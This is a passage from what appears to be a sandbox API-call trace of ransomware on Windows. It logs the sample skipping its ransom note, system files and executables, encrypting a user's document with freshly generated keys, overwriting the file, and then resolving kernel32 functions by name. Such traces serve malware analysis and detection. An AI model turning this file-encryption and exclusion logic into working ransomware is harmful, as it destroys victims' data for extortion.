HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\a05Mw73tf.docx.kPbHL74" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\a05mw73tf.docx.kpbhl74"), dwFlags=0x0) returned 1 [0084.416] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.417] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.417] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.417] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae797500, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae797500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae797500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0084.417] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0084.417] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd18a2700, ftCreationTime.dwHighDateTime=0x1d4d0e4, ftLastAccessTime.dwLowDateTime=0xa699b520, ftLastAccessTime.dwHighDateTime=0x1d4cbd9, ftLastWriteTime.dwLowDateTime=0xa699b520, ftLastWriteTime.dwHighDateTime=0x1d4cbd9, nFileSizeHigh=0x0, nFileSizeLow=0x175e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="FAus_oITOLQc.ppt", cAlternateFileName="FAUS_O~1.PPT")) returned 1 [0084.417] lstrcmpiW (lpString1="FAus_oITOLQc.ppt", lpString2="DECRYPT-FILES.txt") returned 1 [0084.417] lstrcmpiW (lpString1="FAus_oITOLQc.ppt", lpString2="autorun.inf") returned 1 [0084.417] lstrcmpiW (lpString1="FAus_oITOLQc.ppt", lpString2="boot.ini") returned 1 [0084.417] lstrcmpiW (lpString1="FAus_oITOLQc.ppt", lpString2="desktop.ini") returned 1 [0084.417] lstrcmpiW (lpString1="FAus_oITOLQc.ppt", lpString2="ntuser.dat") returned -1 [0084.417] lstrcmpiW (lpString1="FAus_oITOLQc.ppt", lpString2="iconcache.db") returned -1 [0084.417] lstrcmpiW (lpString1="FAus_oITOLQc.ppt", lpString2="bootsect.bak") returned 1 [0084.417] lstrcmpiW (lpString1="FAus_oITOLQc.ppt", lpString2="ntuser.dat.log") returned -1 [0084.417] lstrcmpiW (lpString1="FAus_oITOLQc.ppt", lpString2="thumbs.db") returned -1 [0084.417] lstrcmpiW (lpString1="FAus_oITOLQc.ppt", lpString2="Bootfont.bin") returned 1 [0084.418] lstrlenW (lpString="FAus_oITOLQc.ppt") returned 16 [0084.418] lstrcmpiW (lpString1="ppt", lpString2="lnk") returned 1 [0084.418] lstrcmpiW (lpString1="ppt", lpString2="exe") returned 1 [0084.418] lstrcmpiW (lpString1="ppt", lpString2="sys") returned -1 [0084.418] lstrcmpiW (lpString1="ppt", lpString2="dll") returned 1 [0084.418] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned 57 [0084.418] lstrlenW (lpString="FAus_oITOLQc.ppt") returned 16 [0084.418] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" [0084.418] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="FAus_oITOLQc.ppt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\FAus_oITOLQc.ppt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\FAus_oITOLQc.ppt" [0084.418] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.418] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\FAus_oITOLQc.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\faus_oitolqc.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0084.418] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=95718) returned 1 [0084.418] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0084.418] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.418] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.419] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.419] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.419] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0084.419] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0084.421] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.421] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.422] CloseHandle (hObject=0x42c) returned 1 [0084.422] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.422] WriteFile (in: hFile=0x428, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0084.423] CloseHandle (hObject=0x0) returned 0 [0084.423] CloseHandle (hObject=0x428) returned 1 [0084.423] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.423] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.423] GetTickCount () returned 0x114d911 [0084.423] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.424] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.424] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.424] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.424] lstrlenA (lpString="kernel32.dll") returned 12 [0084.424] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.425] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.425] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.425] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.425] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.425] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.425] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.425] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.425] lstrlenA (lpString="ADDATOMA") returned 8 [0084.425] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.425] lstrlenA (lpString="ADDATOMW") returned 8 [0084.425] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.425] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.425] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.425] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.425] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.425] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.425] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.425] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.425] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.425] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.425] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.425] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.425] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.425] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.425] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.425] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.425] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.425] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.425] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.425] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.425] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.425] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.425] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.425] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.425] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.425] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.425] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.426] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.426] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.426] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.426] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.426] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.426] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.426] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.426] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.426] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.426] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.426] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.426] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.426] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.426] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.426] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.426] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.426] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.426] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.426] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.426] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.426] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.426] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.426] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.426] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.426] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.426] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.426] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.426] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.426] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.426] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.426] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.426] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.426] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.426] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.426] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.426] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.426] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.427] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.427] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.427] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.427] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.427] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.427] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.427] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.427] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.427] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.427] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.427] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.427] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.427] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.427] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.427] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.427] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.427] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.427] lstrlenA (lpString="BEEP") returned 4 [0084.427] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.428] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.428] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.428] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.428] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.428] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.428] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.428] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.428] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.428] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.428] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.428] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.428] lstrlenA (lpString="CANCELIO") returned 8 [0084.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.428] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.428] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.428] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.428] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.428] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.428] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.428] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.429] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.429] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.429] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.429] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.429] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.429] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.429] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.429] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.429] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.429] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.429] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.429] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.429] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.429] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.429] lstrlenA 